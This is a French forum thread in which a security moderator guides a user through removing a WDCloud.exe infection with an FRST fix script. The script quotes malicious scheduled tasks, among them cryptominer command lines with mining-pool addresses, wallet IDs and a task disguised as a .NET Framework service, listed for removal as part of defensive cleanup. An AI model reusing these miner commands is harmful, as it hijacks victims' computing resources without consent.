Supprimer virus WDCloud.exe .

Résolu/Fermé
NBPK - Modifié le 8 janv. 2023 à 13:27
bazfile Messages postés 53573 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 19 avril 2024 - 13 déc. 2022 à 20:07

Bonjour,

Y a une saloperie qui se balade sur ma machine depuis quelques semaines et je ne parviens pas à m'en débarrasser définitivement. J'ai beau désinstaller le machin, je supprimer... ça revient tout le temps.

Je note dans mon gestionnaire de tâches un .exe louche : WDCloud.exe. Attention, à ne pas confondre avec WD My cloud.

Je ne comprends pas exactement ce que ce truc fait, mais ça a pour incidence de me faire des retours au bureau pendant que je suis sur un jeu (par exemple). J'ai peur que ça soit plus nocif que ça.

Ce truc se fout dans %appdata%\Roaming\YSPX\v3-12

J'ai fait des recherches et y a QUE DALLE sur le net à propos de cet .exe ! C'est ouf... 7 résultats dans Google...

Quelqu'un a déjà entendu parler de ce machin et sait comment s'en débarrasser pour de bon ?
Windows / Chrome 108.0.0.0

7 réponses

bazfile Messages postés 53573 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 19 avril 2024 18 453
12 déc. 2022 à 06:52

Bonjour.

Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :

Clique sur Analyser


Attention, attendre que les messages disant que l'analyse est terminée s'affichent.

À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition.

Ensuite envoie les rapports FRST et ADDITION sur PJJOINT voir CE TUTORIEL puis donne les deux liens générés par PJJOINT dans ta réponse.


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bazfile Messages postés 53573 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 19 avril 2024 18 453
Modifié le 12 déc. 2022 à 21:05

Ton pc est infecté.

Avant de te faire un script de désinfection il y a des taches planifiées bizarres qui concernent ANK software connais-tu ce programme d'origine indienne ?

Il y a aussi le logiciel torrent Deluge qui apparaît dans le rapport, vu qu'il n'apparaît pas dans tes programmes installés connais-tu ce logiciel ou tu n'es pas au courant qu'il est sur ton pc ?


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Deluge est à sa place ; ça fait des années que je m'en sers.

Par contre, je ne connais pas du tout ANK software et je ne le vois pas dans mon planificateur de tâches ; il est à quel nom ?

Je n'avais pas du tout pensé à aller voir dans le planificateur ; la tâche VSPXService me paraît extrêmement suspecte étant donné qu'elle est plannifée pour se lancer toutes les deux minutes.
Et je vois dans "Actions" que ça redirige vers rhc.exe WDCloud.exe... C'était donc ça -_-

Je repèce ce "rhc.exe" dans 7 dossiers sur ma machine.

A partir de là, que dois-je donc faire ?

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bazfile Messages postés 53573 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 19 avril 2024 18 453
Modifié le 14 déc. 2022 à 00:25

je ne connais pas du tout ANK software et je ne le vois pas dans mon planificateur de tâches ; il est à quel nom ?

Il est ici :

C:\Users\Jérémie\AppData\Local\Update\v8\updates.exe [29800624 2021-08-20] (ANK Software ->

Pour information rhc.exe dont tu parles dans ton précédent message est dans le même dossier 

C:\Users\Jérémie\AppData\Local\Packages\Update\v8\rhc.exe

on le retrouve aussi ici

C:\Users\Jérémie\AppData\Roaming\YSPX\v3-12\rhc.exe

il est donc aussi dans le dossier de l'infection WDCloud.

Pour voir s'ils sont infectieux va sur le site VirusTotal, tu cliques sur Choose file tu choisis updates.exe si le fichier a déjà été analysé clique sur la petite flèche circulaire en haut à droite une fois l'analyse terminée une page de résultat apparaîtra donne-moi le lien de cette page dans ta réponse, tu fais la même chose avec rhc.exe.

Si les résultats de VirusTotal disent que ces fichiers sont infectieux, voici le script de désinfection.

Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :

 
Start::
CreateRestorePoint:
CloseProcesses:
(APTX Software -> ) [Fichier non signé] C:\Users\Jérémie\AppData\Roaming\YSPX\v3-12\WDCloud.exe
(C:\Users\Jérémie\AppData\Roaming\YSPX\v3-12\WDCloud.exe ->) () [Fichier non signé] C:\Users\JRMIE~1\AppData\Local\Temp\onefile_11452_133153391200150607\WDCloud.exe
Task: {3AA1F057-ACAA-4CE5-BD27-074BFB1D73F1} - System32\Tasks\PxService => C:\Users\Jérémie\AppData\Local\Packages\Paon\v1-5\paon.exe [13776272 2021-11-03] (PAN Software -> ) [Fichier non signé]
Task: {7687993D-E7D0-4061-8ECA-5F7E18C66A3E} - System32\Tasks\UpdateCore0x402 => C:\Users\Jérémie\AppData\Local\Google\Update\v8\updates.exe [29800624 2021-08-20] (ANK Software -> ) [Fichier non signé]
Task: {78862E52-1CD3-4075-88FF-82A5EFECDB00} - System32\Tasks\UpdateCore0x401 => C:\Users\Jérémie\AppData\Local\Packages\Update\v8\updates.exe [29800624 2021-08-20] (ANK Software -> ) [Fichier non signé]
Task: {948B302A-8127-4944-A415-25D61317042F} - System32\Tasks\UpdateCore0x404 => C:\Users\Jérémie\AppData\Local\Microsoft\Update\v8\updates.exe [29800624 2021-08-20] (ANK Software -> ) [Fichier non signé]
Task: {B297B99B-8475-4C54-B853-FA5B72F7279D} - System32\Tasks\VSPXService_LG => C:\Users\Jérémie\AppData\Roaming\YSPX\v3-12\WDCloud.exe [66984712 2022-12-12] (APTX Software -> ) [Fichier non signé]
Task: {C10C79D7-249A-4F6E-806B-74AF7ED2405C} - System32\Tasks\ServiceGPUTaskUpdate => C:\Users\Jérémie\AppData\Local\Packages\Update\v8\rhc.exe [1536 2021-07-09] () [Fichier non signé]
Task: {D7F945A7-8D68-4E6B-A50E-4CDECDE91380} - System32\Tasks\VSPXService => C:\Users\Jérémie\AppData\Roaming\YSPX\v3-12\rhc.exe [1536 2022-11-06] () [Fichier non signé]
Task: {D9723A1A-27CE-4ED7-84A5-C8EE6EA4BAE3} - System32\Tasks\UpdateCore0x400 => C:\Users\Jérémie\AppData\Local\Update\v8\updates.exe [29800624 2021-08-20] (ANK Software -> ) [Fichier non signé]
Task: {F74A40A9-D93C-4B76-931D-32B77A42296D} - System32\Tasks\UpdateCore0x403 => C:\Users\Jérémie\AppData\Local\Mozilla\Update\v8\updates.exe [29800624 2021-08-20] (ANK Software -> ) [Fichier non signé]
C:\Users\JRMIE~1\AppData\Local\Temp\onefile_11452_133153391200150607\WDCloud.exe
C:\Users\Jérémie\AppData\Local\Packages\Paon\v1-5\paon.exe
C:\Users\Jérémie\AppData\Local\Packages\Update\v8
C:\Users\Jérémie\AppData\Roaming\YSPX
HKU\S-1-5-21-1603952896-2009330725-1964855278-1001\...\Run: [GalaxyClient] => [X]
Task: {0A348667-8EDE-46A8-A161-050BB98448B4} - System32\Tasks\Microsoft\Windows\NetFramework\Microsoft .NET Framework => C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe --farm-recheck 200 -G -S us1.ethermine.org:4444 -FS eu1.ethermine.org:4444 -O 0x77754D67409A0dC8339588BEaFe3d71b9547428a.MyRig (Pas de fichier)
Task: {6074401B-5D24-4D59-884E-00A16A5F0948} - System32\Tasks\ServiceCPUTaskUpdate => C:\Users\Jérémie\AppData\Local\Mozilla\Update\rhc.exe cmd /C "it_update -o xmr-eu1.nanopool.org:14433 -u 85vDjFuwVXNbycQnuzHy9JaTxwwV7szYXjMjj4uZCjqj5kvNNCvZ6mFV5WufiUCd3K2woueU7L67w6sE1b9WXd6i4uoQns4.0xd8619f2844 --tls --coin monero --cuda --max-cpu-usage 20 -B --donate-level 1 -l log_it.txt" (Pas de fichier)
Task: {83D35CBB-6BDD-4C12-9073-FA3C7015188B} - System32\Tasks\WDSync => WDSync.exe (Pas de fichier) 
GroupPolicy: Restriction ? 
Policies: C:\ProgramData\NTUSER.pol: Restriction 
CustomCLSID: HKU\S-1-5-21-1603952896-2009330725-1964855278-1001_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> E:\Program Files\Autodesk\3ds Max 2018\Inventor Server\Bin\TestServer.dll => Pas de fichier
CustomCLSID: HKU\S-1-5-21-1603952896-2009330725-1964855278-1001_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> E:\Program Files\Autodesk\3ds Max 2018\Inventor Server\Bin\TestServer.dll => Pas de fichier
CustomCLSID: HKU\S-1-5-21-1603952896-2009330725-1964855278-1001_Classes\CLSID\{997809F3-33FD-4FD6-A2ED-CEF50F3263B1}\InprocServer32 -> C:\Users\Jérémie\AppData\Local\Microsoft\EdgeUpdate\1.3.169.31\psuser_64.dll => Pas de fichier
CustomCLSID: HKU\S-1-5-21-1603952896-2009330725-1964855278-1001_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> E:\Program Files\Autodesk\3ds Max 2018\Inventor Server\Bin\TestServer.dll => Pas de fichier
FirewallRules: [{4C4AF863-C31B-4AB0-AD2A-348EB32809E9}] => (Allow) D:\Steam library\steamapps\common\MrMine\win-unpacked\Mr.Mine.exe => Pas de fichier
FirewallRules: [{72756F16-FED3-4CF7-82F5-6F94E7447DED}] => (Allow) D:\Steam library\steamapps\common\MrMine\win-unpacked\Mr.Mine.exe => Pas de fichier
FirewallRules: [{3F64BB74-1921-4836-8DA9-3B177F37211A}] => (Allow) D:\Steam library\steamapps\common\Breeders of the Nephelym Alpha\Radiant.exe => Pas de fichier
FirewallRules: [{29778A52-7F61-4978-8D81-8D4733BC52C2}] => (Allow) D:\Steam library\steamapps\common\Breeders of the Nephelym Alpha\Radiant.exe => Pas de fichier
FirewallRules: [{F183B201-E9BC-4BFF-9D63-34CDD6D32CD8}] => (Allow) H:\Program Files (x86)\Steam\steamapps\common\Total War THREE KINGDOMS\launcher\launcher.exe => Pas de fichier
FirewallRules: [{BA9158C3-8C2A-4C1B-94CB-DC38ABA9FCE2}] => (Allow) H:\Program Files (x86)\Steam\steamapps\common\Total War THREE KINGDOMS\launcher\launcher.exe => Pas de fichier
FirewallRules: [{166FCC69-6A53-4C3C-8E48-EB65FB59CA29}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe => Pas de fichier
FirewallRules: [{688CCE05-5601-4B07-B6BB-DECD91FEF8CA}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe => Pas de fichier
FirewallRules: [{AB247600-370C-4E07-B594-2C392156CD6C}] => (Allow) D:\Steam library\steamapps\common\The Riftbreaker Demo\bin\Launcher.exe => Pas de fichier
FirewallRules: [{9D5F9C82-E252-474B-A74E-014F54CA0DE7}] => (Allow) D:\Steam library\steamapps\common\The Riftbreaker Demo\bin\Launcher.exe => Pas de fichier
FirewallRules: [{D869E16B-5CDB-42F9-B607-9AF291BF37CB}] => (Allow) D:\Steam library\steamapps\common\The Riftbreaker Demo\bin\riftbreaker_win_release.exe => Pas de fichier
FirewallRules: [{D03B189D-D5D9-4C20-88B0-F7FAFCB1F843}] => (Allow) D:\Steam library\steamapps\common\The Riftbreaker Demo\bin\riftbreaker_win_release.exe => Pas de fichier
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
Edge Extension: (Sheets) - C:\Users\Jérémie\AppData\Local\Packages\Paon\v1-5\addon [2022-01-13]
CHR Extension: (Sheets) - C:\Users\Jérémie\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2022-01-23]
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
 


Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ce rapport fixlog sur PJJOINT puis donne le lien généré par PJJOINT dans ta réponse.

5- Important.

- Réinitialise Edge https://www.malekal.com/comment-reparer-ou-reinitialiser-edge/#Retablir_les_parametres_de_Microsoft_Edge

- Réinitialise Google Chrome https://support.google.com/pixelslate/answer/3296214?hl=fr-CA

6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT


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https://pjjoint.malekal.com/files.php?read=20221213_c9z9u7e11p15 

On dirait que le problème est réglé, un grand merci ! :-)

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bazfile Messages postés 53573 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 19 avril 2024 18 453
Modifié le 13 déc. 2022 à 19:35

Le fixlog est OK.
 

Change tous tes mots de passe en ligne ils ont pu être dérobés.
 

Désinstalle FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.

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Done,

Encore un tout grand merci ! C'était très pro et très efficace :-)

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bazfile Messages postés 53573 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 19 avril 2024 18 453
13 déc. 2022 à 20:07

De rien. :)

@+ sur CCM.

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